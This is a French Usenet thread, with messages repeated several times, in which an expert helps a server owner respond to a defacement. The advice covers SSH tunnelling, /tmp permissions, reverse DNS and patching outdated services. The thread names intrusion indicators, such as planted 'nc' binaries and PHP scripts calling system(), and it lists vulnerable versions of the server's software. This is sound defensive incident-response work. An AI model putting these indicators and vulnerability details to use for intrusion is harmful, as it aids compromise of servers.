mais si je forme le port21 , comment accepter à mon ftp par exemple ? de meme pour le port 80 , 110,22 etc ... , si je les ferme , impossible d'avoir un accé aux services en ecoute sur ses ports depuis l'exterieur non ? y aurait il une solution ? ( je precise que je n'ai pas d'accé physique à la machine qui est sur paris )
Sinon, on a un Sendmail 8.12.8 avec quelques failles aussi, un BIND 92.1 vulnérable également, un ProFTPd 1.2.9 (en configuration par défaut) pas à jour et un OpenSSH 3.5p1. avec des failles mineures. Je n'ai pas creusé le serveur POP, ni le portmapper qui exporte des services en UDP, ni le multiplex SNMP, ni le Webmin sur le port TCP/10000...
Bref, y'a du monde... Mais je reste partisan d'une intrusion via le phpBB.
je vois ... par contre pour webmin , je l'ai mis à jour recemment et je suis sur d'avoir la derniere version stable.
en fait , c'est un peu un avertissement cette intrusion , je realise en consultant le script pl utilisé pour le defacage que la personne aurait pu tout effacer .. bref , si j'ai bien compris , je dois tout mettre à jour ...
cependant , le /tmp/ en 777 m'inquiete un peu , j'aimerais bien trouver un moyen pour qu'apache et mysql puisse ecrire dedans sans qu'il y ai necessairement un chmod en 777 , y aurai t'il une solution à ce niveau car le repertoire tmp a clairement joué un role dans l'attaque.
-- Xaero, Jeu en ligne Xm-jdr http://www.xaero-method.com/jdr
Cedric Blancher
Le Tue, 30 Nov 2004 15:11:29 +0000, Xaero a écrit :
mais si je forme le port21 , comment accepter à mon ftp par exemple ?
Tu peux utiliser sftp qui fourni en standard avec OpenSSH. Au moins, c'est clean et ton mot de passe ne passe pas en clair.
de meme pour le port 80, 110,22 etc ... , si je les ferme , impossible d'avoir un accé aux services en ecoute sur ses ports depuis l'exterieur non ?
Tout ce qui est service publics, oui, tu dois les avoir ouvert. Mais ce qui est à ton usage propre, je le fermerais à l'extérieur et les contacterait via une redirection de port SSH :
ssh -L 1110:127.0.0.1:110 ton_serveur
Te permet de contacter ton serveur, sur son interface de loopback, port 110 via le lien SSH lorsque tu te connectes à ton port local 1110. Donc pas de POP qui traîne en clair sur le réseau. Certains clients de messagerie (Evolution, Mutt, etc.) permettent de se s'autoconfigurer comme ça.
en fait , c'est un peu un avertissement cette intrusion , je realise en consultant le script pl utilisé pour le defacage que la personne aurait pu tout effacer .. bref , si j'ai bien compris , je dois tout mettre à jour ...
S'il a pris le compte root, c'est clair.
cependant , le /tmp/ en 777 m'inquiete un peu , j'aimerais bien trouver un moyen pour qu'apache et mysql puisse ecrire dedans sans qu'il y ai necessairement un chmod en 777 , y aurai t'il une solution à ce niveau car le repertoire tmp a clairement joué un role dans l'attaque.
Le /tmp est _forcément en 777, puisque tout le monde doit pouvoir lire et écrire dedans. Par contre, tu as loupé le sticky bit. En fait, les droits sont 1777, ce qui empêche d'écrire sur les fichiers que les autres ont crée. En outre, une utilisation consciencieuse de /tmp génère des fichiers et répertoires aux droit plus restreints (0700 ou 0600 selon le cas). Mais de toute manière, si le gars est root, tes droits ne servent plus trop à grand chose...
-- ML>finalement en plus du pitbull il faut rajouter l'humilité Mais d'oû qu'ils sortent tous comme ça ? C'est une cuvée spéciale Noël ? -+- MG in : GNU - Ya pas que la dinde qui est en avance -+-
Le Tue, 30 Nov 2004 15:11:29 +0000, Xaero a écrit :
mais si je forme le port21 , comment accepter à mon ftp par exemple ?
Tu peux utiliser sftp qui fourni en standard avec OpenSSH. Au moins, c'est
clean et ton mot de passe ne passe pas en clair.
de meme pour le port 80, 110,22 etc ... , si je les ferme , impossible
d'avoir un accé aux services en ecoute sur ses ports depuis l'exterieur
non ?
Tout ce qui est service publics, oui, tu dois les avoir ouvert. Mais ce
qui est à ton usage propre, je le fermerais à l'extérieur et les
contacterait via une redirection de port SSH :
ssh -L 1110:127.0.0.1:110 ton_serveur
Te permet de contacter ton serveur, sur son interface de loopback, port
110 via le lien SSH lorsque tu te connectes à ton port local 1110. Donc
pas de POP qui traîne en clair sur le réseau. Certains clients de
messagerie (Evolution, Mutt, etc.) permettent de se s'autoconfigurer comme
ça.
en fait , c'est un peu un avertissement cette intrusion , je realise en
consultant le script pl utilisé pour le defacage que la personne aurait
pu tout effacer .. bref , si j'ai bien compris , je dois tout mettre à
jour ...
S'il a pris le compte root, c'est clair.
cependant , le /tmp/ en 777 m'inquiete un peu , j'aimerais bien trouver
un moyen pour qu'apache et mysql puisse ecrire dedans sans qu'il y ai
necessairement un chmod en 777 , y aurai t'il une solution à ce niveau
car le repertoire tmp a clairement joué un role dans l'attaque.
Le /tmp est _forcément en 777, puisque tout le monde doit pouvoir
lire et écrire dedans. Par contre, tu as loupé le sticky bit. En fait,
les droits sont 1777, ce qui empêche d'écrire sur les fichiers que les
autres ont crée. En outre, une utilisation consciencieuse de /tmp
génère des fichiers et répertoires aux droit plus restreints (0700 ou
0600 selon le cas). Mais de toute manière, si le gars est root, tes
droits ne servent plus trop à grand chose...
--
ML>finalement en plus du pitbull il faut rajouter l'humilité
Mais d'oû qu'ils sortent tous comme ça ?
C'est une cuvée spéciale Noël ?
-+- MG in : GNU - Ya pas que la dinde qui est en avance -+-
Le Tue, 30 Nov 2004 15:11:29 +0000, Xaero a écrit :
mais si je forme le port21 , comment accepter à mon ftp par exemple ?
Tu peux utiliser sftp qui fourni en standard avec OpenSSH. Au moins, c'est clean et ton mot de passe ne passe pas en clair.
de meme pour le port 80, 110,22 etc ... , si je les ferme , impossible d'avoir un accé aux services en ecoute sur ses ports depuis l'exterieur non ?
Tout ce qui est service publics, oui, tu dois les avoir ouvert. Mais ce qui est à ton usage propre, je le fermerais à l'extérieur et les contacterait via une redirection de port SSH :
ssh -L 1110:127.0.0.1:110 ton_serveur
Te permet de contacter ton serveur, sur son interface de loopback, port 110 via le lien SSH lorsque tu te connectes à ton port local 1110. Donc pas de POP qui traîne en clair sur le réseau. Certains clients de messagerie (Evolution, Mutt, etc.) permettent de se s'autoconfigurer comme ça.
en fait , c'est un peu un avertissement cette intrusion , je realise en consultant le script pl utilisé pour le defacage que la personne aurait pu tout effacer .. bref , si j'ai bien compris , je dois tout mettre à jour ...
S'il a pris le compte root, c'est clair.
cependant , le /tmp/ en 777 m'inquiete un peu , j'aimerais bien trouver un moyen pour qu'apache et mysql puisse ecrire dedans sans qu'il y ai necessairement un chmod en 777 , y aurai t'il une solution à ce niveau car le repertoire tmp a clairement joué un role dans l'attaque.
Le /tmp est _forcément en 777, puisque tout le monde doit pouvoir lire et écrire dedans. Par contre, tu as loupé le sticky bit. En fait, les droits sont 1777, ce qui empêche d'écrire sur les fichiers que les autres ont crée. En outre, une utilisation consciencieuse de /tmp génère des fichiers et répertoires aux droit plus restreints (0700 ou 0600 selon le cas). Mais de toute manière, si le gars est root, tes droits ne servent plus trop à grand chose...
-- ML>finalement en plus du pitbull il faut rajouter l'humilité Mais d'oû qu'ils sortent tous comme ça ? C'est une cuvée spéciale Noël ? -+- MG in : GNU - Ya pas que la dinde qui est en avance -+-
Cedric Blancher
Le Tue, 30 Nov 2004 15:11:29 +0000, Xaero a écrit :
Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal. erf ... en fait ca consiste en quoi , j'avoue que au niveau des dns , j'ai
pataugé et j'ai un peu laché l'affaire , à la base m'occuper d'un serveur , c'est pas du tout mon domaine donc j'ai un peu fait comme j'ai pu :/
Toi, tu t'occupes de ton domaine. Par contre, ton hébergeur, lui, s'occupe de la classe d'IP, et il peut associer à ton IP un nom pour qu'on puisse faire une requête DNS sur l'IP. c'est ça un enregistrement inverse (reverse DNS). Tu dois lui demander de le mettre en place.
ok , c'est vrai qu'il faudrait que je mette à jour :(
Bah ouais...
bizarrement , les logs sont tres etrange , on dirait que la personne avait directement accé au serveur , cette personne a balancé ses wget sans probleme ( plus de 100 ) et sans qu'apache ne detecte aucune erreur , le premier wget est apparu comme ça à 23h47. petite question : est ce qu'une commande wget balancée en ssh avec accé root se retrouve dans le error_log ?
Ton mec a réussi à chopper un shell root sur ta machine, c'est un fait. La question est de savoir comment. Donc tu dois regarder tes logs sur les heures précédents ces premières traces. Si le mec est passé par ton phpBB, Apache n'y verra rien à redire. Cherche un peu sur ta machine la trace de scripts PHP bizarres (genre qui contiennent un appel de system() par exemple) et des binaires qui ne sont clairement pas à toi ("nc" par exemple). Je ne peux pas prédire ce qui a été fait, mais le fait d'uploader un binaire et un script PHP pour le lancer est classique. Regarde aussi du côté des connexions SSH (auth.log), il y a des attaques par dictionnaire qui tournent en ce moment. Si ton mot de passe root est un peu faible, ou qu'un compte classique avec mot de passe faible ou par défaut est présent, il est peut-être passé par là. Ce que tu dois comprendre, c'est qu'une fois qu'il aura un accès shell à ta machine, le pas à faire pour passer root n'est plus très fort, surtout si ton kernel n'est pas à jour (nombreux local root via le kernel sous Linux).
http://www.xaero-method.com/info Surtout vu la configuration que ça affiche... je le concede :/
C'est un grand classique.
-- BOFH excuse #8:
static buildup
Le Tue, 30 Nov 2004 15:11:29 +0000, Xaero a écrit :
Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse
DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal.
erf ... en fait ca consiste en quoi , j'avoue que au niveau des dns , j'ai
pataugé et j'ai un peu laché l'affaire , à la base m'occuper d'un serveur ,
c'est pas du tout mon domaine donc j'ai un peu fait comme j'ai pu :/
Toi, tu t'occupes de ton domaine. Par contre, ton hébergeur, lui,
s'occupe de la classe d'IP, et il peut associer à ton IP un nom pour
qu'on puisse faire une requête DNS sur l'IP. c'est ça un enregistrement
inverse (reverse DNS). Tu dois lui demander de le mettre en place.
ok , c'est vrai qu'il faudrait que je mette à jour :(
Bah ouais...
bizarrement , les logs sont tres etrange , on dirait que la personne
avait directement accé au serveur , cette personne a balancé ses wget
sans probleme ( plus de 100 ) et sans qu'apache ne detecte aucune erreur
, le premier wget est apparu comme ça à 23h47. petite question : est
ce qu'une commande wget balancée en ssh avec accé root se retrouve
dans le error_log ?
Ton mec a réussi à chopper un shell root sur ta machine, c'est un fait.
La question est de savoir comment. Donc tu dois regarder tes logs sur les
heures précédents ces premières traces.
Si le mec est passé par ton phpBB, Apache n'y verra rien à redire.
Cherche un peu sur ta machine la trace de scripts PHP bizarres (genre qui
contiennent un appel de system() par exemple) et des binaires qui ne sont
clairement pas à toi ("nc" par exemple). Je ne peux pas prédire ce qui a
été fait, mais le fait d'uploader un binaire et un script PHP pour le
lancer est classique.
Regarde aussi du côté des connexions SSH (auth.log), il y a des attaques
par dictionnaire qui tournent en ce moment. Si ton mot de passe root est
un peu faible, ou qu'un compte classique avec mot de passe faible ou par
défaut est présent, il est peut-être passé par là.
Ce que tu dois comprendre, c'est qu'une fois qu'il aura un accès shell à
ta machine, le pas à faire pour passer root n'est plus très fort,
surtout si ton kernel n'est pas à jour (nombreux local root via le kernel
sous Linux).
http://www.xaero-method.com/info
Surtout vu la configuration que ça affiche...
je le concede :/
Le Tue, 30 Nov 2004 15:11:29 +0000, Xaero a écrit :
Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal. erf ... en fait ca consiste en quoi , j'avoue que au niveau des dns , j'ai
pataugé et j'ai un peu laché l'affaire , à la base m'occuper d'un serveur , c'est pas du tout mon domaine donc j'ai un peu fait comme j'ai pu :/
Toi, tu t'occupes de ton domaine. Par contre, ton hébergeur, lui, s'occupe de la classe d'IP, et il peut associer à ton IP un nom pour qu'on puisse faire une requête DNS sur l'IP. c'est ça un enregistrement inverse (reverse DNS). Tu dois lui demander de le mettre en place.
ok , c'est vrai qu'il faudrait que je mette à jour :(
Bah ouais...
bizarrement , les logs sont tres etrange , on dirait que la personne avait directement accé au serveur , cette personne a balancé ses wget sans probleme ( plus de 100 ) et sans qu'apache ne detecte aucune erreur , le premier wget est apparu comme ça à 23h47. petite question : est ce qu'une commande wget balancée en ssh avec accé root se retrouve dans le error_log ?
Ton mec a réussi à chopper un shell root sur ta machine, c'est un fait. La question est de savoir comment. Donc tu dois regarder tes logs sur les heures précédents ces premières traces. Si le mec est passé par ton phpBB, Apache n'y verra rien à redire. Cherche un peu sur ta machine la trace de scripts PHP bizarres (genre qui contiennent un appel de system() par exemple) et des binaires qui ne sont clairement pas à toi ("nc" par exemple). Je ne peux pas prédire ce qui a été fait, mais le fait d'uploader un binaire et un script PHP pour le lancer est classique. Regarde aussi du côté des connexions SSH (auth.log), il y a des attaques par dictionnaire qui tournent en ce moment. Si ton mot de passe root est un peu faible, ou qu'un compte classique avec mot de passe faible ou par défaut est présent, il est peut-être passé par là. Ce que tu dois comprendre, c'est qu'une fois qu'il aura un accès shell à ta machine, le pas à faire pour passer root n'est plus très fort, surtout si ton kernel n'est pas à jour (nombreux local root via le kernel sous Linux).
http://www.xaero-method.com/info Surtout vu la configuration que ça affiche... je le concede :/